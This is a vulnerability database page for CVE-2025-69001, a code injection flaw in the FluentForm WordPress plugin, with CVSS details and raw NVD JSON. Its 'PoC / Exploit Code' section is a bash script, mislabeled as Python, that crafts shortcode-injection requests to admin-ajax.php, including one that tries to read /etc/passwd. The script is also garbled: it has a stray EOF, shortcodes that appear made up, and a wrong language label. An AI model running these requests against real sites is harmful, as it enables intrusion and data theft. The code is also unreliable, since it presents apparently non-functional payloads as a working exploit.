Security Vulnerability Report
中文
CVE-2025-69001 CVSS 5.3 MEDIUM

CVE-2025-69001

Published: 2026-01-22 17:16:16
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Shahjahan Jewel FluentForm fluentform allows Code Injection.This issue affects FluentForm: from n/a through <= 6.1.11.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

FluentForm插件 <= 6.1.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-69001 PoC - FluentForm Arbitrary Shortcode Execution # Target: WordPress site with FluentForm plugin <= 6.1.11 TARGET_URL="http://target-site.com" # PoC 1: Basic shortcode injection test # This demonstrates the vulnerability by injecting a simple shortcode cat << 'EOF' > poc_form.html <!DOCTYPE html> <html> <head> <title>FluentForm Shortcode Injection PoC</title> </head> <body> <h1>CVE-2025-69001 PoC</h1> <form action="${TARGET_URL}/wp-json/fluent-form/v1/forms" method="POST"> <input type="hidden" name="form_id" value="1"> <input type="hidden" name="_fluentform_14_nonce" value="${NONCE}"> <!-- Shortcode injection in form field --> <input type="text" name="shortcode_field" value="[wp_privacy_policy_consumer title='test']"> <input type="submit" value="Exploit"> </form> </body> </html> EOF # PoC 2: curl-based exploitation # Extract sensitive information using shortcode execution curl -X POST "${TARGET_URL}/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "action=fluentform_submit_form&form_id=1&shortcode_payload=[get_post_metadata post_id=1 key=_wp_page_template]" # PoC 3: File inclusion via shortcode curl -X POST "${TARGET_URL}/wp-admin/admin-ajax.php" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "action=fluentform_submit_form&form_id=1&shortcode_payload=[elfight_show_file filepath=/etc/passwd]" echo "PoC executed. Check responses for data exfiltration." EOF # Usage: # 1. Replace TARGET_URL with the vulnerable WordPress site # 2. Obtain a valid form_id and nonce if required # 3. Execute the curl commands to test shortcode injection # 4. Successful exploitation will return executed shortcode output

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69001", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:15.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Shahjahan Jewel FluentForm fluentform allows Code Injection.This issue affects FluentForm: from n/a through <= 6.1.11."}, {"lang": "es", "value": "Control inadecuado de la generación de código ('Inyección de Código') vulnerabilidad en Shahjahan Jewel FluentForm fluentform permite la inyección de código.Este problema afecta a FluentForm: desde n/a hasta &lt;= 6.1.11."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/fluentform/vulnerability/wordpress-fluentform-plugin-6-1-11-arbitrary-shortcode-execution-vulnerability?_s_id=cve", "source": "[email protected]"}]}}